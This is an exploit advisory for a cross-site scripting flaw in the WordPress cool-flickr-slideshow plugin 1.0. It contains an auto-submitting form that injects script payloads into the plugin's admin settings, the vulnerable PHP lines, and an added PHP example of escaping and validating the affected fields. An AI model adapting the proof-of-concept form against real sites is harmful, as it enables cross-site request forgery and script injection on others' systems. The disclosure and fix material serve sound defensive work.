WordPress cool-flickr-slideshow Plugin Cross-Site Scripting (XSS)

2017.09.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

___________________________________________________
|
| Exploit Title: WordPress cool-flickr-slideshow Plugin Cross-Site Scripting (XSS)
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage: https://wordpress.org/plugins/cool-flickr-slideshow/
| Software Link: https://downloads.wordpress.org/plugin/cool-flickr-slideshow.1.0.zip
| Version: 1.0
| Date: 2017 - 07 - 9
| Tested on: Kali-Linux / FireFox
|__________________________________________________

Exploit :

<form name="form1" method="POST" Action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=flickr-gallery-settings">
<input type="hidden" name="flickr-gallery_hidden" value="Y" />
<input type="hidden" name="flickr_type" value=""><script>alert("xss1")</script>" />
<input type="hidden" name="flickr_uid" value="1" />
<input type="hidden" name="flickr_api" value="MMM" />
<input type="hidden" name="flickr_groupid" value='1' />
<input type="hidden" name="flickr_set" value="" />
<input type="hidden" name="flickr_width" value='"><script>alert("xss 2")</script>' />
<input type="hidden" name="flickr_height" value='"><script>alert("xss 3")</script>' />
<input type="hidden" name="Submit" value="Save" />
</form>
<script language="javascript">
setTimeout('form1.submit()', 1);
</script>
__________________________________________________

Vulnerable File :

/wp-content/plugins/cool-flickr-slideshow/flickr_gallery_admin.php

Vulnerable code:

line 154 :

<select id="flickr_type" name="flickr_type" onchange="javascript:ChangeFlickrType(this.value);">
<option selected="" value=""/><script>alert(1000)</script>">SELECT</option>
<option value="user">User</option>
<option value="group">Group</option>
<option value="set">Set</option>
<option value="api">API</option>
</select>

line 185 :

<p><span style="width: 75px;float: left;"><?php _e("Width: " ); ?> </span><input type="text" name="flickr_width" value="<?php echo $flickr_width; ?>" size="20"></p>

line 186 :

<p><span style="width: 75px;float: left;"><?php _e("Height: " ); ?> </span><input type="text" name="flickr_height" value="<?php echo $flickr_height; ?>" size="20"></p>
__________________________________________________

#patch:

To fix this vulnerability, use the htmlspecialchars() function.
__________________________________________________

Discovered By : M.R.S.L.Y
__________________________________________________
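
The htmlspecialchars() fix named in the patch note, shown beside the unescaped output from lines 185-186, as an added example that is not the plugin's code. It goes one step beyond the advisory by also validating the fields before output (integers for width and height, an allowlist for flickr_type); the helper names attr, clean_dimension and clean_type and the sample POST values are constructed.

```php
<?php
// Added example, not the plugin's code. Field names come from the advisory;
// the helper names and the sample input are constructed for illustration.

// Escape a value for use inside a double- or single-quoted HTML attribute.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Width and height are pixel counts: keep them as non-negative integers.
function clean_dimension($raw): int
{
    return max(0, (int) $raw);
}

// flickr_type only has the values offered by the <select> in the settings form.
function clean_type($raw): string
{
    $allowed = ['user', 'group', 'set', 'api'];
    return in_array($raw, $allowed, true) ? $raw : '';
}

// Constructed POST body carrying the kind of markup shown in the advisory.
$post = [
    'flickr_type'   => '"><script>alert(1)</script>',
    'flickr_width'  => '"><script>alert(2)</script>',
    'flickr_height' => '480',
];

$flickr_type   = clean_type($post['flickr_type']);
$flickr_width  = clean_dimension($post['flickr_width']);
$flickr_height = clean_dimension($post['flickr_height']);

// Unescaped output, as on lines 185-186: the quote closes the attribute.
echo '<input type="text" name="flickr_width" value="' . $post['flickr_width'] . '">', "\n";
// Escaped output of the same raw string: it stays inside the attribute.
echo '<input type="text" name="flickr_width" value="' . attr($post['flickr_width']) . '">', "\n";
// Validated and escaped output, as the settings page would render it.
echo '<input type="text" name="flickr_width" value="' . attr((string) $flickr_width) . '">', "\n";
echo '<input type="text" name="flickr_height" value="' . attr((string) $flickr_height) . '">', "\n";
echo '<option selected value="' . attr($flickr_type) . '">SELECT</option>', "\n";
```

Inside WordPress, esc_attr() is the core helper for attribute output and can take the place of the attr() wrapper used here.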



Copyright 2017, cxsecurity.com